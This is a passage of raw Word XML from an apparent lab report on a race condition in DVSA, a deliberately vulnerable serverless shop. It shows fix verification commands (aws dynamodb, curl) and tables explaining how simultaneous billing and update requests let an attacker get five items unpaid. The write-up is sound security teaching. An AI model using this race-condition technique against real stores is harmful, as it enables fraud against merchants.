            <w:tcW w:w="31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78D22843" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>!= 100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="1DE2A9D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0D211C" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Updates allowed at status 100</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BC0B55" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Yes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0BA5C1" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="6E949E53"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B9A76F2" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Updates allowed at status 110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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FD1F397" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Yes (vulnerable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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47A9AE3" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No (blocked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="7197072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8AC844" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Updates allowed at status 120+</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31CB1F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No</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4A25C1" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="144300CF"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9FA12D3" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Race condition possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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19B1074A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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771652B" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6982C509" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CDE12E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 8) Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4485AA" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>After applying the fix, the order status is manually set to 110 to simulate a payment attempt, then the update is tried:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C8B06F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46257EE5"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Manually set order status to 110 to simulate payment started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781F8AD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>aws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dynamodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> update-item \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402DC463"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--table-name DVSA-ORDERS-DB \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3E501"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key '{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"orderId</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"S":"'"$ORDER_ID</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,"userId</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"S":"c4e81498-</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05256F"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--update-expression "SET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = :s" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A1DDE"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--expression-attribute-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>values '{"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:s</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"N":"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>110"}}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8A1F2"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--region us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC981A7" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537FBB1C"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Now try to update the order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639FA09"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curl -s --http1.1 "$API/order" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A1571"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-H "Content-Type: application/</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245578A7"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-H "Authorization: $TOKEN_A" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E026805" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --data-raw '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>action":"update","order-id</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ORDER_ID"'","items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">":{"1":5}}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D5D815A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47382526" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Expected: {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">"status": "err", "msg": "order already </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>paid"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FF5F945" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A68BD6F" w14:textId="1AE40136" w:rsidR="00A52975" w:rsidRDefault="00D278E0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="772F2514" wp14:editId="7D176A01">
            <wp:extent cx="5934075" cy="3406385"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="10069134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1852" cy="3428071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F381E59" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Screenshot 8 — Terminal showing the update request now returns status err with msg order already paid after the fix is applied, confirming the race condition is prevented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F0F9B2" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A818CE" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Verification confirms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC431E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Before fix: update returned cart updated even during billing — race condition exploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7337BD26" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>After fix: update returns order already paid as soon as order status moves past 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C604055" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The fix correctly prevents order modification once any payment attempt has begun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390DB83" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Legitimate users can still update their cart while the order is in open state (status 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77421A3C" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF57458" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 9) Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D3A40" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Table A — Intended Logic vs. Observed Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B305A67" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A5297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1700"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="2530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A52975" w14:paraId="2A485B84" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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49090140" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Vulnerability</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7981DA4D" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Intended Rule(s)</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05A0A4F3" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="193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7EE4C42F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Normal Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253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29472AF9" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Exploit Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="46373912" w14:textId="77777777">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4EB8E40" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic Vulnerability (Race Condition)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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BBD0909" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Once billing starts, the order must be </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>locked</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> and no quantity updates should be accepted. The final billed amount must always match the order contents at the time of payment. Status transitions must be enforced strictly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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E108BAB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DVSA-ORDER-UPDATE Lambda source code; DynamoDB DVSA-ORDERS-DB order records; order status list in code comments; billing and update API responses; DynamoDB before and after attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="193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BCADA17" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>A single update request with status 100 returns cart updated correctly. A single billing request processes the order at the correct quantity. The order status progresses sequentially through the workflow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253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01D7C52" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Sending billing and update simultaneously causes the update to succeed (cart updated) while billing is processing. DynamoDB shows </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>itemList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> changed to 5 items while </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>totalAmount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> remains 0 — the attacker received 5x items without paying for them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F9534DD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A19ED82" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Table B — Deviation Analysis and Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB96B4B" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A5297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1"/>
        <w:gridCol w:w="1693"/>
        <w:gridCol w:w="1199"/>
        <w:gridCol w:w="1685"/>
        <w:gridCol w:w="1817"/>
        <w:gridCol w:w="1525"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A52975" w14:paraId="11E6496E" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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4755F8A2" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Vulnerability</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48303744" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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7CC5126D" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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2F60E0ED" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Fix Applied (Where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="183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32A1AB5B" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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50" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7F3791EE" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="3B553D1E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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4A9BBF14" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic Vulnerability (Race Condition)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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3FE2BFF" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">The update function checked </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>orderStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; 110, allowing modifications at status 100 and 110. Since billing takes time to complete and change the status, a concurrent update request can win the race and modify the order after billing has started but before it completes. This violates the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>intended business rule that billed amounts must match order contents.</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58EAA549" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Intentional misuse / security-relevant abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
